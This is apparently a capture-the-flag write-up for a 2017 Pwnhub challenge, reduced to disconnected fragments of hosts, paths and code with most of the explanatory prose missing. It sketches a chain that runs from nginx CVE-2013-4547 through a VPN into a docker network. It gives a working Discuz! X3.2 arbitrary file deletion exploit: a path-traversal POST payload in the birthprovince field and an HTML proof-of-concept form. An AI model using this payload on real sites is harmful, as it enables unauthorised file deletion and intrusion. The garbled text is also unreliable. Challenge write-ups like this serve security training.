Pwnhub 2013C014 2017-10-04
54.223.177.152:80
2017.10.03 17:50:16 Discuz Discuz
2017.10.03 11:24:40 Flag
2017.10.02 15:45:49 Nginx server
CVE-2013-4547 + + + VPN + docker + Discuz!X
CVE-2013-4547
nginx nmap 22 80 ssh
.DS_Store
admin/
config/
includes/
pwnhub/
upload /
pwnhub/ 403 cve-2013-4547 pwnhub/
.DS_Store
untar.py
return.cfg
123 1.cfg tar 123
docker/etc/crontab
cron_run.sh
cd /home/jdoajdoiq/jdijiqjwi/jiqji12i3198uax192/run/ && python run.py
run.py
mail_send.py VPN
mac L2TP/IPsec PSK …
docker
docker 172.17.x.x ipip 172.17.0.3
index.php
Oh Hacked safe.php nmap 80 3306 8090
8090 Discuz! X3.2
Discuz!X
Discuz!X index.php include safe.php safe.php
http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
post
birthprovince=../../../../../../../../../../../../usr/share/nginx/html/safe.php&profilesubmit=1&formhash=b8f4701a
formhash hash CentOS nginx /usr/share/nginx/html/
http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base
poc:
<form action="http://172.17.0.3:8090/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="b8f4701a"/>
<input type="text" name="profilesubmit" value="1"/>
<input type="submit" value="Submit" />
</form>
safe.php referer
get flag
http://172.17.0.3/index.php passwd=jiajiajiajiajia